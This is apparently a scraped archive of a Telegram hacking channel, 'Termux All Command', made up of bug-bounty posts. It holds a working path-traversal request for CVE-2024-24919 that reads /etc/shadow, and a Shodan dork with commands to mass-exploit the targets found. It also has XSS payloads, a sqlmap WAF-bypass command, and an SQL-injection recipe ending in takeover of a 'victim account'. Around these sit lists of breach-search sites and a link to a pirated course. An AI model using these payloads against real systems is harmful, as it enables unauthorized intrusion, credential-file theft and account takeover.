Endi mavjud! Telegram Tadqiqoti 2025 β yilning asosiy insaytlari 
Termux All Command [Telegram Group]
Kanalga Telegramβda oβtish
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Ko'proq ko'rsatish1 185
Obunachilar
+124 soatlar
+157 kunlar
+4830 kunlar
Postlar arxiv
For this vulnerability
Shodan dork: title:"Check Point" ssl:"target"
CVE-2024-24919
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
CVE-2023-48795 "Vulnerable to Terrapin"
Discovered vulnerability: Terrapin
Identified using Nuclei Tools:
Command: nuclei -u http://xyz.com -t /home/hackerhalt/nuclei-templates/javascript/cves
Learn more about Terrapin Scanner: https://lnkd.in/grjTd5Js
Trending CVE-2024-24919
Exploit link https://lnkd.in/gqX7u2jF
Commands:
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
python3 exploit.py -l ~/targets.txt -t 200 -o output.txt -ftd /etc/passwd
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)>
Usefull Cross Site Scripting Xss Payload
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
#DataBreach Search Engines π
Some of the best data breach search engines I've come across.
β Intelligence X - https://intelx.io
β leakcheck - https://leakcheck.io
β weleakinfo - https://weleakinfo.io
β leakpeek - https://leakpeek.com
β snusbase - https://snusbase.com
β GlobaLeaks - https://www.globaleaks.org
β Firefox Monitor - https://lnkd.in/gW7EqXr
β haveibeenpwned? - https://haveibeenpwned.com
β ScatteredSecrets - https://lnkd.in/gegkVQPN
β AmIBreched - https://amibreached.com
β Leak Lookup - https://leak-lookup.com
β Breach Checker - https://breachchecker.com
β RSLookup - https://rslookup.com
β Ghost Poject - https://ghostproject.fr
β Exposed - https://exposed.lol
π Top Recon Tools for Bug Bounty π
π Nmap - https://nmap.org/
π΅οΈ Nikto - https://cirt.net/Nikto2
π Amass - https://lnkd.in/dwfGpGUd
π Dirsearch - https://lnkd.in/dGAZc38
π Sublist3r - https://lnkd.in/fPHtNKH
πͺ Knockpy - https://lnkd.in/grGa9UU
π Gitrob - https://lnkd.in/egY6chT
π Shodan - https://www.shodan.io/
π Censys - https://censys.com/
π Subfinder - https://lnkd.in/d3extT6
π Feroxbuster - https://lnkd.in/emQfsVM
π DnsValidator - https://lnkd.in/gaaPMT5V
π Rustscan - https://lnkd.in/dEt2jWn
π€ Waymore - https://lnkd.in/dP5yeaxy
π· Gospider - https://lnkd.in/eDmZB8ct
π Top Recon Tools for Bug Bounty π
π Nmap - https://nmap.org/
π΅οΈ Nikto - https://cirt.net/Nikto2
π Amass - https://lnkd.in/dwfGpGUd
π Dirsearch - https://lnkd.in/dGAZc38
π Sublist3r - https://lnkd.in/fPHtNKH
πͺ Knockpy - https://lnkd.in/grGa9UU
π Gitrob - https://lnkd.in/egY6chT
π Shodan - https://www.shodan.io/
π Censys - https://censys.com/
π Subfinder - https://lnkd.in/d3extT6
π Feroxbuster - https://lnkd.in/emQfsVM
π DnsValidator - https://lnkd.in/gaaPMT5V
π Rustscan - https://lnkd.in/dEt2jWn
π€ Waymore - https://lnkd.in/dP5yeaxy
π· Gospider - https://lnkd.in/eDmZB8ct
π¨SHARE SOMEONE NEED ITπ¨
πFREE Bug Bounty Complete Course! π
πDownload Link: https://lnkd.in/dRBaf6mX
If you find sql injection and encounter a 403 or waf block, be sure to try tamper scripts and update your sqlmap πΉπΉπ₯π₯³π₯³
sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash
Credit:@ynsmroztas
FREE Bug Bounty Complete Course! π₯π₯
Learn Bug Bounty to identify and report System vulnerabilities before cybercriminals exploit them.
A Udemy Complete Course.
Download Link: https://lnkd.in/dRBaf6mX
ππ©ππ
π½πΉπΌπΆππ is a database of exploits for all of the old & new common exposures and weaknesses (CVEs) by collecting the exploits automatically from around the internet websites & projects such as (#github, #gitlab, packet storm security, #metasploit modules and many more) as a Real-Time Monitoring System.
Β» https://cvexploits.io/
Parameters Finder using just waybackurls tool:
Command: waybackurls vulnweb.com | sort -u | grep "=" | grep -Piv "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)$
ππππ
πππ πππππππππ πππ
ππππππ ππππ ππππππ
katana -u vulnweb.com -d 5 -ps -pss waybackarchive,coomoncrawl,alienvault -f qurl -jc -xhr -kf -fx -fx dn -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg
-u vulnweb.com specifies the target URL.
-d 5 sets the depth.
-s waybackarchive,commoncrawl,alienvault sets the sources.
-f qurl sets the output format.
-jc enables JavaScript crawling.
-xhr enables XHR crawling.
-kf enables keyword filtering.
-fx and -fx dn set filters to exclude certain types of files.
-ef excludes files with specific extensions.
Bug bounty tips And tricks ππ€©
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
hashtag#bug hashtag#bugbounter hashtag#bughunter hashtag#bugfixing hashtag#bugtips
